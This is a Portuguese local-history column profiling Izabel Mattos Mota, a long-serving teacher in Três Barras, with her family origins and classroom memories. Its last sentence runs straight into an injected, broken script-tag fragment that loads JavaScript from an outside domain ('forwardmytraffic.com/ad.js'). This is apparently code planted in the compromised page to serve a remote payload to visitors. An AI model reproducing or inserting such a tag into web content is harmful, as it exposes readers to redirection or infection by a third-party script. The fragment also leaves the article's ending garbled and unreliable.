Colunistas Curiosidades do Passado História

Três Barras: lembranças do passado Izabel Mattos Mota

Soeli Regina Lima

 

Izabel Mattos Mota, nascida em 10/07/1922, é filha de José Tomas de Mattos e Ana Maria de Mattos. De família tradicional, colonizadora na região de Canoinhas, aos 95 anos de idade ela relata:

 

 

“Do meu pai, o avô dele era de Portugal e a avó dele índia, dessa região de Talnay. Eles vieram pelo rio que era navegável, o Rio Negro. Eles já vieram de barco a vapor para ir para as serras. Não podiam entrar por causa dos índios. Não tinha estrada de ferro, nada, ainda, quando meus bisavós vieram. Meu bisavô porque minha bisavó era índia. Ele teve que agradar os índios, daí casou com uma, teve filhos com ela. Eu tenho sangue de índios”.

 

 

Dona Izabel, iniciou a carreira lecionando nas localidades de Taunay e Fartura, mas o destino havia reservado Três Barras para sua vida. Ela foi professora na E.E.B. “General Osório” por 23 anos e contribuiu com a educação de muitos tresbarrenses.

 

 

Recordou que em sua primeira turma, numa classe multisseriada, havia um menino repetente que segundo a professora anterior, não tinha jeito de aprender. Ela observou que o aluno ao apagar, esfregava a borracha muitas vezes e acabava furando as folhas do caderno. Certo dia, quando ela chegou perto do aluno, ele olhou assustado para a varinha de marmelo, pendurada na parede, usada pela professora anterior. Ela delicadamente falou:

 

– Você não pode fazer assim. Essas folhas são como sua vida. Cada buraquinho que você faz representa um precipício que poderá cair. Serão as dificuldades que terá que enfrentar quando crescer.

 

 

O menino olhou sério para ela e nunca mais usou a borracha daquele jeito. Passados os anos ela recebeu a visita de um senhor, distinto. Era o menino que aprendeu a ler, escrever, cuidar do caderno e consequentemente de sua vida. O senhor agradeceu toda a dedicação e carinho lembrando do episódio da borracha que ele nunca havia esquecido.

 

 

Após 25 anos de trabalho, aposentada, ela ministrou aulas de ioga por dois anos no chamado “Quadro”, antiga área da serraria Lumber. Dona Izabel, habilitada em Educação Física, semanalmente ia para Curitiba fazer curso de aperfeiçoamento para as aulas. Exemplo de dedicação, continuou atuando no magistério, mais oito anos, na E.E.B. “Almirante Barroso” e E.E.B. “Sagrado Coração de Jesus”.

 

 

Com certeza, temos grandes lições de vida ao ouvir as histórias de Dona Izabel…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Comente esta matéria: